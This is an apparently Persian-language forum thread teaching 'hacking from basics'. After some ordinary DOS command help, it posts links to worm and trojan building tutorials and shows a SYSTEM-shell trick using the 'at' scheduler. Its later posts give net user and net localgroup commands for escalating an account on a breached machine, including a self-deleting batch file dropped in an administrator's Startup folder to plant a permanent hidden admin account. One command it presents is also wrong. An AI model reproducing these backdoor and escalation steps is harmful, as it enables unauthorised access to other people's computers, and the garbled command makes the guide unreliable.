آموزش هك از پايه

UNDELETE

شکل کلی دستور:

UNDELETE [d:][path][filename]
UNDELETE[/list|/all]]

عمل: بازگرداندن فایل هایی که با دستور DELETE از بین رفته اند

این کار قبلا توسط دستور Recover انجام می شد اما دستور recover دیگه قدیمی شده و در ورژن های 5 به بالا کامل حذف شده. دستور UNDELETE حالا کاری مشابه انجام می ده هرچند قدرت زیادی نداره و اگه فایلی رو پاک کنید و بعد روی درایو یه فایل جدید ایجاد کنید یا هرگونه تغییری روی درایو اعمال کنید این دستور دیگه نمی تونه اون فایل پاک شده رو برگردونه. پس اگه تصادفا فایلی رو پاک کردید که لازمش داشتید سریعا تمام برنامه هایی رو که دارید اجرا می کنید متوقف کنید و از این دستور استفاده کنید.

کد:

---

/all

---

تمام فایل های پاک شده قابل بازیابی رو برمی گردونه

کد:

---

/list

---

لیست تمام فایل های پاک شده قابل بازیابی رو نشون می ده ( قبل از بازیابی کردن)

مثال:

برای undelete کردن تمام فایل های قابل بازیابی از دایرکتوری LETTERS تایپ می کنیم:

کد:

---

undelete \letters\*.* /all

---

FC

شکل کلی دستور:
برای مقایسه ASCII:

کد:

---

FC [d:][path]filename [d:][path]filename [/A][/L][/Lb n] [/N]

---

و برای مقایسه های باینری:

کد:

---

FC [d:][path]filename [d:][path]filename [/B]

---

عمل: مقایسه دو فایل و نمایش تفاوتها

این دستور تفاوت های دو فایل مشخص شده رو گزارش می کنه. برای مقایسه دو فایل بطور کامل احتیاج به فضای خالی کافی در RAM هست که اگه این فضای خالی به اندازه کافی نباشه داس تمام خطوط دو فایل رو مقایسه نمی کنه بلکه تا جایی که فضا اجازه بده پیش می ره و در نتیجه، نتیجه بدست آمده متفاوت خواهد بود پس دقت کنید.

کد:

---

/A

---

بجای نشان دادن تمام خطوط متفاوت دو فایل، فقط اولین و آخرین خطوط متفاوت نمایش داده می شوند

کد:

---

/B

---

مقایسه باینری رو انجام می ده که فایل ها بایت به بایت مقایسه می شن و از اولین آدرس نمایش بایت های متفاوت آغاز می شه. بطور پیش فرض برای مقایسه فایل هایی با پسوند COM, .EXE, .SYS, .BIN, .OBJ و LIB داس از مقایسه باینری استفاده می کنه مگر اینکه از سویچ /L استفاده کنید تا مقایسه اسکی انجام بشه

کد:

---

/L

---

مقایسه ASCII دو فایل.داس بطور پیش فرض برای تمام فایل هایی که پسوندی غیر از COM, .EXE, .SYS, .BIN, .OBJ و LIB دارند مقایسه اسکی انجام می ده مگر اینکه از سویچ /B استفاده کنید.

کد:

---

/Lb n

---

با این سویچ شما تعداد خطوطی رو که با هم مقایسه می شن مشخص می کنید. بطور پیش فرض فضای لازم برای مقایسه 100 خط وجود داره و شما با این سویچ این پیش فرض رو تعییر می دید و بنابراین اگه تعداد خطوط متفاوت از میزان پیش فرض بیشتر باشه پیغام خطا دریافت می کنید.

کد:

---

/N

---

شماره خطوط متفاوت هم نوشته می شن

مثال:

برای مقایسه ASCII فایل های LETTER.TXT و MEMO2.TXT که در درایو B قرار دارن تایپ می کنیم:

کد:

---

fc /l letter.txt b:memo2.txt

---

برای مقایسه binary دو فایل CHECK.EXE و CHECK2.EXE می نویسیم:

کد:

---

fc /b check.exe check2.exe

---

منم یکم فضولی کنم:
چندتا کتاب مفید میذارم:

آموزش کامل و گام به گام هک:

کد:

---

http://dl.kamyabonline.com/download/program/----%20Learning%20In%20Persian.exe

---

پسورد:

کد:

---

www.kamyabonline.com

---

اموزش ساخت کرم بلاستر:

کد:

---

http://www.4shared.com/file/21595656/4f32a08e/Blaster.html

---

آموزش تصویری ساخت تروجان:

کد:

---

http://narmafzarboys.persiangig.com/My%20Book/Mgic-PS.rar

---

آموزش کامل بوت کردن در چت روم:

کد:

---

http://manmusic.persiangig.com/document/Boot%20%20%20%20%20%20%20%20%20%20%20%20%20www.NARAMFZARBOYS.BLOGFA.com.rar

---

آموزش هک نفوذ و راههای مقابله با آن:

کد:

---

http://biya-too.persiangig.com/DAVOOD2.zip

---

پسورد:mdd




آموزش قدم به قدم هك:

کد:

---

http://www.parstech.org/detail.php?id=1112

---

آموزش هك وامنيت شبكه:

کد:

---

http://www.parstech.org/detail.php?id=1079

---

چون كسي چيزي نگفت خودم ميگم
اول cmd رو اجرا ميكنيم و اگر الان ساعت سيستم من 11:08 باشه با دستور At براي يك دقيقه ديگه يه Cmd باز ميكنم
اين همون Scheduled هست پس مينوسيم At 11:09 /interactive "cmd.exe"
و منتظر ميشم تا cmd بياد
اما فرق اين cmd با cmd معمولي اينه كه اين از Svchost.exe لود ميشه

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا task manager رو باز ميكنم(ALT+CTRL+DEl) يا روي تسكبار راست كليك كنيد و سپس Task Manager
حالا به تب Processes بريد و explorer.exe رو End Task كنيد
بعد در پنجره Cmd جديد بنويسيد explorer.exe
با اينكار explorer.exe دوباره لود ميشه حالا از منوي استارت يه نگاه به User Name بندازيد ميشه اين

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
و حالا روي System منظورم همون نام يوزر در استارت هست كليك كنيد ميبينيد كه با پيغام Null موجه ميشيد
اينو من ازش به عنوان يه آسيب پذيري استفاده كردم و ابزارشم اگه وقت كنم مينويسم

دوستان كي تكميل ميكنه مبحث Cmd رو ؟
مخصوصا Net User
ميخام يه مبحث ديكه شروع كنم

نقل قول:

---

نوشته شده توسط majeed76 [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چون كسي چيزي نگفت خودم ميگم
اول cmd رو اجرا ميكنيم و اگر الان ساعت سيستم من 11:08 باشه با دستور At براي يك دقيقه ديگه يه Cmd باز ميكنم
اين همون Scheduled هست پس مينوسيم At 11:09 /interactive "cmd.exe"
و منتظر ميشم تا cmd بياد
اما فرق اين cmd با cmd معمولي اينه كه اين از Svchost.exe لود ميشه

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا task manager رو باز ميكنم(ALT+CTRL+DEl) يا روي تسكبار راست كليك كنيد و سپس Task Manager
حالا به تب Processes بريد و explorer.exe رو End Task كنيد
بعد در پنجره Cmd جديد بنويسيد explorer.exe
با اينكار explorer.exe دوباره لود ميشه حالا از منوي استارت يه نگاه به User Name بندازيد ميشه اين

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
و حالا روي System منظورم همون نام يوزر در استارت هست كليك كنيد ميبينيد كه با پيغام Null موجه ميشيد
اينو من ازش به عنوان يه آسيب پذيري استفاده كردم و ابزارشم اگه وقت كنم مينويسم

---

خیلی جالب بود
net user رو هم خودت بگو
باز اگه توی مبحث های بعدی تونستم کمکت می کنم

قسمت دوم
دوستا ببخشيد كه دير مباحث رو قرار مي دم.
آقا مجيد به من پيغام دادن كه سرع مباحث رو قرار بدم وتا اينكه يه مبحث جديد رو آغاز كنند.
متسفانه تو اين وقت كم نمي شه مباحث NET رو بست.و بايد بگم با يكي 2 تا پست شئني نيست .كم كم حدود 2 هفته طول ميكشه تا مباحث نت رو به طور كامل و شيوا توضيح داد.من هم به دليل اينكه قول داده بودم و بايد مباحث رو كامل مي كردم هر چي فكر كردم ديدم نمي شه.
يا بايد يكسري رو توضيح بدم و برقيه هم ديگه هيچي براي همين تصميم گرقتم تا تمامي فرمان ها رو به طور كامل بنويسم و كارسون رو هم توضيح بدم.و اين كار نمي ذاره به صورت تخصصي روي مبجث كليك كرد.
اينم
آرشيو كه تو اين زمان كم سريع در اووردم.

Net accounts تنظيمات و سياستهاي همه نامهاي كاربري يك رايانه يا دامنه خاص را پيكر بندي ميكند

Net computer از دامنه جاري رايان ها را حذف يا اضافه ميكند.

Net config اطلاعات سرويس گيرنده شبكه را نمايش ميدهد

Net continue راه اندازي يك سرويس تعليغ شده

Net diag نمايش اطلاعات مفيدي درباره سخت افزار اتصالات شبكه

Net file فايلهاي مشترك بين كاربران شبكه را نمايش در مي آورد و ميبيندوقفل فايلها را بر ميدارد

Net group گروهاي سراسري ايجاد ميكند يا حذف ميكند و كاربران را با آن گروه ها اضافه يا از آن حذف ميكند

Net help اطلاعات كمكي در باره زير فرمان نت خاص را به نمايش در مي آورد

Net helpmsg درباره يك كد خطاي مربوط به پروتك و كارت شبكه مورد استفاده بدون بهرگيري از برنامه windowsprotocol manager

Net name تعريف نام مستعار جديدي براي ارسال پيغام

Net logoff خاتمه جلسه ما بين رايانه حاضر و رايانه حاوي منابع مشترك

Net logon اتصال به حوزه يا گروه كاري مورد نظر

Net password تغيير كلمه عبور كاربري در شبكه

Net pause تعليق يك سرويس در حال اجرا

Net send ارسال پيغام به كاربر يا كامپيوتر ديگري بر روي شبكه
.
.
.
.
.
ببخشيد ديگه اگر به توضيحات تخصصي نرسيديم.خيلي دوست داشتم مبحثlocalgroup رو باز ميكردم
البته باز هم فرمانهاي ديگري هست كه ديگه شرمنده نه وقت هست روي اين مبحث بمونيم ونه اينكه حالشو.ديگه ا بس تايپ كردم خسته شدم.ببخشيد ديگه ميرم بخوابم.ضمنا مبحث جديد رو بگيد تا ببينيم چي ميشه
Ddesigner:h.mosleh
User in the p30world:newmusic

قمست سوم.
مي خوايم در اين مبحث فرمان لوكال گروپ رو باز كنيم.
خوب اصلا اين فرمان چيست و براي چه كاري استفاده ميشه.
شما بعد از نفوذ به يا كلاينت مي تونيد از طريق شلي كه گرتين يك يوزر بسازيد ولي ممكن هست در اون ورت يوزر شما قابليت ادمين رو نداشته باشد كه در اين صورت دچار مشكل ميشين ولي با استفاده از فرمان لوكال گروپ مي تونيد اين يوزر رو به سطح ادميني برسونيد.
ما مثلا يوزر p30world رو ايجاد كرديم وحالا مي خوايم اين يوزر رو به سطح ادميني برسونيم. براي اين
كا ر از فرمان زير استفاده ميكنيم.
net user localgroup p30world /add
با استفاده از اين فرمان يوزر ما به راحتي به سطح ادمين مي رسه و شما سطح دسترسي تون در كامپيوتر طرف به بالاترين درجه قرار دارد.

دوستان اين هم مبحث لوكال گروپ كه قولش رو داده بودم.اميدوارم مفيد باشه.من ديگه در مورد Net صحبتي نميكنيم.
ضمنا بگم در زمينه هكينگ قسمت Net يكي از جاهاي حصاص هست كه اگر بخبي بتوني اجرا كنيد.خيلي ميتونه مفيد باشه.ضمنا اين قسمت بحثش انتقدر داغ هست و مسائل بسياري داره كه شما تا آخر عمرتون هم بشينيد بازم چيز جديدترين توش مي تونيد پيدا كنيد.البته به دليل يكسري مسائل امنيتي از رو كردن بسياري از دستورات مهم و خاص در مكان puplic خودداري كردم.

Designer:h.mosleh
User in the p30world:newmusic

مرسي از همه بچه ها به خاطر كمكشون
فقط يه نكته وقتي يه يوزر به اسم Majeed ساختيم به اين صورت
Net User Majeed 123 /add
كه نام يوزرم ميشه Majeed و پسوردش ميشه 123
اما اين يوزر ليميت هست
براي ادمين كردن اون بايد بنويسيم Net Localgroup Administrators Majeed /add
براي ديدن لسيت سطح دسترسي يوزرها مينويسم Net Loacalgroup
كه اين دستور ليست تمامي يوزرها رو ميده حالا اگر خواستيم ليست يوزرهايي رو كه ادمين هستند رو بگيريم بايد بنويسيم Net LocalGroup Administrators
و همونجور كه Newmusic جان گفتند اين دستورات بسيار حساس و مهم هستند
يه نكته دستوراتي رو كه در cmd مينويسم ميتونيم در همون notepad هم بنويسم فقط بايد با پسوند Bat سيو بشه
يه مثال (در يك Client يعني همون كامپيوتر شخصي)
فرض كنيد ميخام يه يوزر بسازم و بعد اونو ادمين كرده و همچنين از صفحه logon مخفي كنم(اين به عنوان تمرين)
براي اينكار همونجور كه گفتم دستورات cmd رو در notepad نوشته و به نام m.bat سيو ميكنم ,و اونو در Startup قرار ميدم كه هر وقت ادمين لوگين شد اجرا بشه اما كلي ميگم تمرين و پيشرفته كردنش پاي خودتون
اينارو تو Notepad مينويسم ><<<حالا واسه هر يوزري و يا Administrators

Net User Majeed 123 /add
Net Localgroup Administrators Mjaeed /add
net user majeed /expires:never
del m.bat

________________________
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
________________________
توضيح :خط اول ميدونيد يوزر ميسازه به نام majeed و رمز 123
خط دوم majeed رو ادمين(مدير) ميكنه
خط سوم مدت موجود بودن Majeed رو دايم ميكنه
خط آخر هم براي جلوگيري از تابلو شدن فايل رو حذف ميكنه در هر جا كه باشه
حالا اين فايل رو كه ساختيم به هر صورت ميتونيم تو استارت آپ مدير قرار بديم مثلا با داس در مسير كه هر وقت ادمين Login شد اجرا بشه و بعد هم حذف بشه
K:\Documents and Settings\Admin user\Start Menu\Programs\Startup
;كه Admin userكاربر مدير ميشه
اما پنهان كردن يوزر به عنوان تمرين(خودمم بعدن ميگم)
پيشنهادم اينه كه دستورات Net رو كامل ياد بگيريد اينم مرجعش!!!! Net Help
>>در ضمن دوستاني هم كه قصد همكاري حرفه اي با من دارن تو اين تايپيك لطفا private بدن
<<<به اميد روزي كه ايران قله هاي سايبر رو فتح كند>>>
By:Majeed $-2007

توی صفحه اول این خطش باید اصلاح بشه:
C:\Documents and Settings\ newmusic>net user p30world \del
به این:
C:\Documents and Settings\ newmusic>net user p30world /del